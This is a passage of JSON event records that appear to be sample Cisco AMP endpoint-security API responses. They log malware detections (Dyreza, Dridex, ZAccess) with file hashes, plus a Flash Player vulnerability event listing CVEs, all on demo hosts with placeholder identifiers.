Detected","event_type_id":1090519054,"detection":"GenericKD:Dyreza-tpd","detection_id":"6176256279812505635","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Dyre","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"23:d5:92:eb:f8:9b"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"webinstall.exe","file_path":"C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe","identity":{"sha256":"4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc","sha1":"ec80314ae4a2817be806b7ae27dbdb31a88226a0","md5":"e9d8c15e7d18678dd41771f72ed6693c"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6156209481303720000,"timestamp":1610705203,"timestamp_nanoseconds":152000000,"date":"2021-01-15T10:06:43+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.DFC.MalParent","detection_id":"6156209481303719955","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Dridex","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"23:8a:fc:e3:35:8c"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"4543543.exe","file_path":"C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\4543543.exe","identity":{"sha256":"7c9d5724064693dfeef76fd4da8d6f159ef0e6707e67c4a692a03e94f4a6e27a","sha1":"fc5d6fc2cbb1d95864f5ed26b50e4ebe68333eab","md5":"107a3bef0da9ab2b42e3e0f9f843093b"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6156209477008753000,"timestamp":1610705202,"timestamp_nanoseconds":138000000,"date":"2021-01-15T10:06:42+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.DFC.MalParent","detection_id":"6156209477008752658","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Dridex","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"23:8a:fc:e3:35:8c"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"4543543.exe","file_path":"C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\4543543.exe","identity":{"sha256":"7c9d5724064693dfeef76fd4da8d6f159ef0e6707e67c4a692a03e94f4a6e27a","sha1":"fc5d6fc2cbb1d95864f5ed26b50e4ebe68333eab","md5":"107a3bef0da9ab2b42e3e0f9f843093b"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6176256228272898000,"timestamp":1610705193,"timestamp_nanoseconds":996000000,"date":"2021-01-15T10:06:33+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"GenericKD:Dyreza-tpd","detection_id":"6176256228272898082","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Dyre","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"23:d5:92:eb:f8:9b"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"webinstall.exe","file_path":"C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe","identity":{"sha256":"4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc","sha1":"ec80314ae4a2817be806b7ae27dbdb31a88226a0","md5":"e9d8c15e7d18678dd41771f72ed6693c"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6156209416879210000,"timestamp":1610705188,"timestamp_nanoseconds":769000000,"date":"2021-01-15T10:06:28+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.DFC.MalParent","detection_id":"6156209416879210513","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Dridex","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"23:8a:fc:e3:35:8c"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"4543543.exe","file_path":"C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\4543543.exe","identity":{"sha256":"7c9d5724064693dfeef76fd4da8d6f159ef0e6707e67c4a692a03e94f4a6e27a","sha1":"fc5d6fc2cbb1d95864f5ed26b50e4ebe68333eab","md5":"107a3bef0da9ab2b42e3e0f9f843093b"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6156209412584243000,"timestamp":1610705187,"timestamp_nanoseconds":755000000,"date":"2021-01-15T10:06:27+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.DFC.MalParent","detection_id":"6156209412584243216","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Dridex","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"23:8a:fc:e3:35:8c"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"4543543.exe","file_path":"C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\4543543.exe","identity":{"sha256":"7c9d5724064693dfeef76fd4da8d6f159ef0e6707e67c4a692a03e94f4a6e27a","sha1":"fc5d6fc2cbb1d95864f5ed26b50e4ebe68333eab","md5":"107a3bef0da9ab2b42e3e0f9f843093b"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6176256181028258000,"timestamp":1610705182,"timestamp_nanoseconds":0,"date":"2021-01-15T10:06:22+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"GenericKD:Dyreza-tpd","detection_id":"6176256181028257825","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Dyre","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"23:d5:92:eb:f8:9b"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"webinstall.exe","file_path":"C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe","identity":{"sha256":"4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc","sha1":"ec80314ae4a2817be806b7ae27dbdb31a88226a0","md5":"e9d8c15e7d18678dd41771f72ed6693c"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6176256125193683000,"timestamp":1610705169,"timestamp_nanoseconds":972000000,"date":"2021-01-15T10:06:09+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"GenericKD:Dyreza-tpd","detection_id":"6176256125193682976","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Dyre","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"23:d5:92:eb:f8:9b"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"webinstall.exe","file_path":"C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe","identity":{"sha256":"4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc","sha1":"ec80314ae4a2817be806b7ae27dbdb31a88226a0","md5":"e9d8c15e7d18678dd41771f72ed6693c"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6176256073654075000,"timestamp":1610705157,"timestamp_nanoseconds":960000000,"date":"2021-01-15T10:05:57+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"GenericKD:Dyreza-tpd","detection_id":"6176256073654075423","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Dyre","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"23:d5:92:eb:f8:9b"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"webinstall.exe","file_path":"C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe","identity":{"sha256":"4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc","sha1":"ec80314ae4a2817be806b7ae27dbdb31a88226a0","md5":"e9d8c15e7d18678dd41771f72ed6693c"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6533665784395203000,"timestamp":1610705155,"timestamp_nanoseconds":851000000,"date":"2021-01-15T10:05:55+00:00","event_type":"Policy Update","event_type_id":553648130,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Threat_Audit","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"63:5f:47:2b:89:91"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":1489955899829000000,"timestamp":1610705149,"timestamp_nanoseconds":829000000,"date":"2021-01-15T10:05:49+00:00","event_type":"Vulnerable Application Detected","event_type_id":1107296279,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Low","start_timestamp":1610705149,"start_date":"2021-01-15T10:05:49+00:00","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_ZAccess","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"e8:5d:f7:a4:c5:03"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Clean","file_name":"FlashPlayerApp.exe","identity":{"sha256":"c1219f0799e60ff48a9705b63c14168684aed911610fec68548ea08f605cc42b"}},"vulnerabilities":[{"name":"Adobe Flash Player","version":"11.5.502.146","cve":"CVE-2013-3333","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-3333"},{"cve":"CVE-2014-0502","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-0502"},{"cve":"CVE-2014-0498","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-0498"},{"cve":"CVE-2014-0497","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-0497"},{"cve":"CVE-2014-0492","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-0492"},{"cve":"CVE-2014-0491","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-0491"},{"cve":"CVE-2013-5332","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-5332"},{"cve":"CVE-2013-5324","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-5324"},{"cve":"CVE-2013-5329","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-5329"},{"cve":"CVE-2013-5330","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-5330"},{"cve":"CVE-2013-3361","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-3361"},{"cve":"CVE-2013-3362","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-3362"},{"cve":"CVE-2013-3363","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-3363"},{"cve":"CVE-2013-3344","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-3344"},{"cve":"CVE-2013-3345","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-3345"},{"cve":"CVE-2013-3347","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-3347"},{"cve":"CVE-2013-3343","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-3343"},{"cve":"CVE-2013-2728","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-2728"},{"cve":"CVE-2013-3324","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-3324"},{"cve":"CVE-2013-3325","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-3325"},{"cve":"CVE-2013-3326","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-3326"},{"cve":"CVE-2013-3327","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-3327"},{"cve":"CVE-2013-3328","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-3328"},{"cve":"CVE-2013-3329","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-3329"},{"cve":"CVE-2013-3330","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-3330"},{"cve":"CVE-2013-3331","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-3331"},{"cve":"CVE-2013-3332","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-3332"},{"cve":"CVE-2013-3334","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-3334"},{"cve":"CVE-2013-3335","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-3335"},{"cve":"CVE-2013-1378","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-1378"},{"cve":"CVE-2013-1379","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-1379"},{"cve":"CVE-2013-1380","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-1380"},{"cve":"CVE-2013-2555","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-2555"},{"cve":"CVE-2013-0646","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-0646"},{"cve":"CVE-2013-0650","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-0650"},{"cve":"CVE-2013-1371","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-1371"},{"cve":"CVE-2013-1375","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-1375"},{"cve":"CVE-2013-0504","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-0504"},{"cve":"CVE-2013-0638","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-0638"},{"cve":"CVE-2013-0639","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-0639"},{"cve":"CVE-2013-0642","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-0642"},{"cve":"CVE-2013-0644","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-0644"},{"cve":"CVE-2013-0645","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-0645"},{"cve":"CVE-2013-0647","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-0647"},{"cve":"CVE-2013-0649","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-0649"},{"cve":"CVE-2013-1365","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-1365"},{"cve":"CVE-2013-1366","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-1366"},{"cve":"CVE-2013-1367","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-1367"},{"cve":"CVE-2013-1368","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-1368"},{"cve":"CVE-2013-1369","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-1369"},{"cve":"CVE-2013-1370","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-1370"},{"cve":"CVE-2013-1372","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-1372"},{"cve":"CVE-2013-1373","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-1373"},{"cve":"CVE-2013-1374","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-1374"},{"cve":"CVE-2014-0507","score":9.3,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-0507"},{"cve":"CVE-2013-5331","score":9.3,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-5331"},{"cve":"CVE-2013-0648","score":9.3,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-0648"},{"cve":"CVE-2013-0643","score":9.3,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-0643"},{"cve":"CVE-2013-0634","score":9.3,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-0634"},{"cve":"CVE-2013-0633","score":9.3,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-0633"},{"cve":"CVE-2014-0499","score":7.8,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-0499"},{"cve":"CVE-2014-0503","score":6.4,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-0503"}]}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":5832364536253907000,"timestamp":1610705149,"timestamp_nanoseconds":228000000,"date":"2021-01-15T10:05:49+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"Backdoor2:ZAccess-tpd","detection_id":"5832364536253906973","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_ZAccess","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"e8:5d:f7:a4:c5:03"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"80000000.@","file_path":"\\\\?\\C:\\$Recycle.Bin\\S-1-5-18\\$ff20833dbb78e410a1126d2ca0eecb73\\U\\80000000.@","identity":{"sha256":"9a9de323dc2ba4059c3eb10d20e8b93a4cc44c93ac41a5dfc9572fa1c0d5b1a8","sha1":"f18d87d7c547ed6118b74b2208e592f67b7fca43","md5":"800381acbba0e7bff6cfd0cfd704bf09"},"parent":{"process_id":496,"disposition":"Clean","file_name":"services.exe","identity":{"sha256":"d7bc4ed605b32274b45328fd9914fb0e7b90d869a38f0e6f94fb1bf4e9e2b407","sha1":"54a90c371155985420f455361a5b3ac897e6c96e","md5":"5f1b6a9c35d3d5ca72d6d6fdef9747d6"}}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6176255953394991000,"timestamp":1610705129,"timestamp_nanoseconds":942000000,"date":"2021-01-15T10:05:29+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"GenericKD:Dyreza-tpd","detection_id":"6176255953394991134","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Dyre","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"23:d5:92:eb:f8:9b"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"webinstall.exe","file_path":"C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe","identity":{"sha256":"4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc","sha1":"ec80314ae4a2817be806b7ae27dbdb31a88226a0","md5":"e9d8c15e7d18678dd41771f72ed6693c"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":5832364428879725000,"timestamp":1610705124,"timestamp_nanoseconds":271000000,"date":"2021-01-15T10:05:24+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"Kazy:Troj_Generic-tpd","detection_id":"5832364394519986204","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_ZAccess","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"e8:5d:f7:a4:c5:03"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"n","file_path":"\\\\?\\C:\\$Recycle.Bin\\S-1-5-18\\$ff20833dbb78e410a1126d2ca0eecb73\\n","identity":{"sha256":"c9dbfc24f40bc1aa49bd8eac43eb08c26d4587b926f7bacb94cb44a87cdc5600","sha1":"9f9cc367265c8e04747004f4bb122d6084c9bd79","md5":"69bc8b1dcfde7443d80d4b34b45bd193"},"parent":{"process_id":3924,"disposition":"Clean","file_name":"InstallFlashPlayer.exe","identity":{"sha256":"672ec8dceafd429c1a09cfafbc4951968953e2081e0d97243040db16edb24429","sha1":"5c921b125bac24670d2bf27659e100cdf24e7e7f","md5":"2ff9b590342c62748885d459d082295f"}}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6176255919035253000,"timestamp":1610705121,"timestamp_nanoseconds":628000000,"date":"2021-01-15T10:05:21+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"GenericKD:Dyreza-tpd","detection_id":"6176255919035252765","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Dyre","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"23:d5:92:eb:f8:9b"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"jwenjktgenwrger234231.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\Desktop\\D94038FDE7B0F343931DF8040B\\jwenjktgenwrger234231.exe","identity":{"sha256":"7e54dceecd3d3a23a896e971ae4bb9e71a64a5c1c3b77ac1c64241c55c1b95bb","sha1":"5250d75aaa81095512c5160a8e14f941e2022ece","md5":"789b94e94c2793266fe673c578fd8c1b"},"parent":{"process_id":3652,"disposition":"Malicious","file_name":"webinstall.exe","identity":{"sha256":"4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc","sha1":"ec80314ae4a2817be806b7ae27dbdb31a88226a0","md5":"e9d8c15e7d18678dd41771f72ed6693c"}}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6176255919035253000,"timestamp":1610705121,"timestamp_nanoseconds":612000000,"date":"2021-01-15T10:05:21+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"GenericKD:Dyreza-tpd","detection_id":"6176255919035252764","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Dyre","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"23:d5:92:eb:f8:9b"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"webinstall.exe","file_path":"\\\\?\\C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe","identity":{"sha256":"4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc","sha1":"ec80314ae4a2817be806b7ae27dbdb31a88226a0","md5":"e9d8c15e7d18678dd41771f72ed6693c"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6176255919035253000,"timestamp":1610705121,"timestamp_nanoseconds":487000000,"date":"2021-01-15T10:05:21+00:00","event_type":"Threat 